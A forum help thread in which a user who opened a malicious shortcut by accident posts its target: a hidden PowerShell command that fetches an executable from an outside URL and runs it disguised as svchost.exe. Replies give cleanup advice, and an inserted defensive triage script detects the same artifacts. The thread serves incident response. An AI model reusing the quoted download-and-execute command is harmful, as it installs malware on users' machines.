Help with a Windows PowerShell shortcut

Pterodacton

Hello all.

I found a zipped video file on my iPhone, don't remember downloading it, inside was a file with the extension of shortcut, the shortcut leads to Windows PowerShell, long story short I double clicked the shortcut by accident, nothing seemed to happen but my harddrive made some noise like it was doing something, I'm suspecting the worst at the moment but was wondering, how do I see what the shortcut did? Could it have run something on my computer? I'm presuming whatever it was, it wasn't good. 

Thanks in advance. 

What was the file extension? If it was .ps1 it is a PowerShell script; I highly suggest looking at it and posting the code in a code block.

Yep, it's a .lnk file.

The target box has this written in it...

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://cdn.che.moe/kyvept.exe','%APPDATA%\svchost.exe');Start-Process '%APPDATA%\svchost.exe'

I browse 4chan, am I screwed?

12 minutes ago, Pterodacton said:

Yep, it's a .lnk file.

The target box has this written in it...

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://cdn.che.moe/kyvept.exe','%APPDATA%\svchost.exe');Start-Process '%APPDATA%\svchost.exe'

I browse 4chan, am I screwed?

That's not good... Go to the AppData folder and delete svchost.exe. It will probably be running, so use something like FileAssassin. Then run something like Malwarebytes and see if it left over any registry keys. Do this quickly; you don't know what it is doing. C&C? Someone could be keylogging, downloading files or whatever right now. Delete that file first. https://www.malwarebytes.com/fileassassin/

Might be worth running some scans with software like TDSSKiller etc. afterwards. But do this, QUICKLY!!! GOGOGO!!
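The question running through this thread is "how do I see what the shortcut did?" The script below is an added example (not code from any poster) that triages a suspicious .lnk from the defender's side: it reads the shortcut's target without launching it, flags the download-and-execute tokens seen in the target above, then hunts for the artifacts that target would leave behind: the file written to %APPDATA%\svchost.exe, any svchost.exe process running outside System32, Run-key persistence pointing at it, and PowerShell script-block log entries (event 4104) where that logging is enabled. The shortcut path in `$ShortcutPath` is an assumption; the drop path and URL are taken from the thread's own target string.

```powershell
# Added example: triage a suspicious .lnk and look for the artifacts its target would leave.
# $ShortcutPath is an assumed location; adjust it to wherever the .lnk was extracted.
param(
    [string]$ShortcutPath = "$env:USERPROFILE\Downloads\video.lnk"
)

# 1. Read the shortcut target and arguments without executing it (WScript.Shell COM object).
$shell = New-Object -ComObject WScript.Shell
$lnk   = $shell.CreateShortcut($ShortcutPath)
"Target   : $($lnk.TargetPath)"
"Arguments: $($lnk.Arguments)"

# Tokens that, together, are the signature of a hidden download-and-execute one-liner.
$suspicious = @('-ExecutionPolicy bypass', '-windowstyle hidden', 'WebClient', 'DownloadFile', 'Start-Process')
$hits = $suspicious | Where-Object { $lnk.Arguments -match [regex]::Escape($_) }
if ($hits) { "Suspicious tokens in arguments: $($hits -join ', ')" }

# Pull any URLs out of the arguments so you know exactly what was fetched (the thread's
# target referenced http://cdn.che.moe/kyvept.exe).
[regex]::Matches($lnk.Arguments, "https?://[^'""\s]+") |
    ForEach-Object { "URL referenced: $($_.Value)" }

# 2. The payload was written to %APPDATA%\svchost.exe. The genuine svchost.exe lives only in
#    System32; a copy in a user-writable profile folder is never legitimate.
$dropPath = Join-Path $env:APPDATA 'svchost.exe'
if (Test-Path $dropPath) {
    $f = Get-Item $dropPath
    "Dropped file present: $dropPath  size=$($f.Length)  created=$($f.CreationTime)"
    # Record the hash before deleting so it can be looked up or reported later.
    "SHA256: $((Get-FileHash $dropPath -Algorithm SHA256).Hash)"
} else {
    "No file at $dropPath"
}

# 3. Is anything named svchost.exe running from outside System32?
Get-CimInstance Win32_Process -Filter "Name = 'svchost.exe'" |
    Where-Object { $_.ExecutablePath -and $_.ExecutablePath -notlike "$env:SystemRoot\System32\*" } |
    ForEach-Object { "Rogue svchost PID $($_.ProcessId): $($_.ExecutablePath)" }

# 4. Persistence: Run keys whose value points at an svchost.exe outside System32.
$runKeys = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
           'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run'
foreach ($k in $runKeys) {
    if (Test-Path $k) {
        (Get-ItemProperty $k).PSObject.Properties |
            Where-Object { $_.Value -like '*svchost.exe*' -and $_.Value -notlike '*System32*' } |
            ForEach-Object { "Run key entry ${k}\$($_.Name) = $($_.Value)" }
    }
}

# 5. Script block logging (event 4104 in the PowerShell Operational log) records what
#    PowerShell actually ran, where that logging is enabled.
try {
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } -ErrorAction Stop |
        Where-Object { $_.Message -match 'DownloadFile|svchost\.exe' } |
        Select-Object -First 10 TimeCreated,
            @{ n = 'Snippet'; e = { $_.Message.Substring(0, [Math]::Min(200, $_.Message.Length)) } }
} catch {
    "No matching 4104 events (script block logging may be off, or the log is empty)"
}
```

Run it from an elevated PowerShell prompt so the HKLM Run key and the Operational log are readable. The shortcut is only parsed, never launched, so inspecting it this way is safe even if the .lnk is still on disk; copy the file somewhere isolated first if you want to keep it as evidence.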

Deleted the file. I don't think it was running; scanning now with TDSSKiller. Thanks for your quick reply. :)

EDIT: Nothing was found with TDSSKiller.

Anything else I could do to double check everything's A-OK?

31 minutes ago, Pterodacton said:

Deleted the file. I don't think it was running; scanning now with TDSSKiller. Thanks for your quick reply. :)

EDIT: Nothing was found with TDSSKiller.

Anything else I could do to double check everything's A-OK?

Yes, hey.

You could run something like Emsisoft Emergency Kit and check for any left-over malware. But even if it's not running, that can be a bad sign; it could have dropped something. Run EEK to make sure it's all alright: https://www.emsisoft.com/en/software/eek/
